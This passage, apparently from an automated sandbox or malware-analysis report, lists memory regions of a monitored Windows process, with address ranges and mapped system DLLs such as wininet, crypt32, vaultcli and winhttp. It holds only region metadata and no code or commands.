"private_0x00000000001e0000" filename = "" Region: id = 1078 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1079 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1080 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1081 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1082 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1083 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1084 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1085 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1086 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1087 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1088 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1089 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1090 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1091 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1092 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1093 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1094 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1095 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1096 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1097 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1098 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1099 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1100 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1101 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1102 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1103 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1104 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1105 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1106 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1107 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1108 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1109 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1110 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1111 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1112 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1113 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1114 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1115 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1116 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1117 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1118 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1119 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1120 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1121 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1122 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1123 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1124 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1125 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1126 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1127 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1128 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1129 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1130 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1131 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1132 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1133 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1134 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1135 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1136 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1137 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1138 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1139 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1140 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1141 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1142 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1143 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1144 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1145 start_va = 0x890000 end_va = 0x89cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1146 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1147 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1148 start_va = 0xb90000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 1149 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1150 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1151 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1152 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1153 start_va = 0x1f90000 end_va = 0x238afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f90000" filename = "" Region: id = 1154 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1155 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1156 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1157 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1158 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1159 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1160 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1161 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1162 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1163 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1164 start_va = 0x7ffb19d70000 end_va = 0x7ffb19ffdfff monitored = 0 entry_point = 0x7ffb19e40f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1165 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1166 start_va = 0x7ffb26760000 end_va = 0x7ffb2677bfff monitored = 0 entry_point = 0x7ffb267631a0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1167 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1168 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1169 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1170 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1171 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1172 start_va = 0x4a0000 end_va = 0x5e2fff monitored = 0 entry_point = 0x4c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1173 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1174 start_va = 0x7ffb174f0000 end_va = 0x7ffb176a7fff monitored = 0 entry_point = 0x7ffb1755e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1175 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1176 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1177 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1178 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1179 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1180 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1181 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1182 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1183 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1184 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1185 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1186 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1187 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1188 start_va = 0x4a0000 end_va = 0x4bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1189 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1190 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1191 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1192 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1193 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1194 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1195 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1196 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1197 start_va = 0x2390000 end_va = 0x26c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1198 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1199 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1200 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1201 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1202 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1203 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1204 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1205 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1206 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1207 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1208 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1209 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1210 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1211 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1212 start_va = 0x20000 end_va = 0x2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1213 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1214 start_va = 0x26d0000 end_va = 0x27affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1239 start_va = 0x7ffb10dc0000 end_va = 0x7ffb10e0afff monitored = 0 entry_point = 0x7ffb10dd1590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 1242 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1243 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1244 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1245 start_va = 0x27b0000 end_va = 0x287cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 1246 start_va = 0x2880000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1247 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1248 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1249 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1250 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1251 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1252 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1253 start_va = 0x27b0000 end_va = 0x282ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 1254 start_va = 0x2870000 end_va = 0x287cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 1255 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1256 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1257 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1258 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1259 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1260 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1261 start_va = 0x2a00000 end_va = 0x2adcfff monitored = 0 entry_point = 0x2a5e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1262 start_va = 0x2a00000 end_va = 0x2adcfff monitored = 0 entry_point = 0x2a5e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1263 start_va = 0x2a00000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1264 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1265 start_va = 0x2a80000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 1266 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 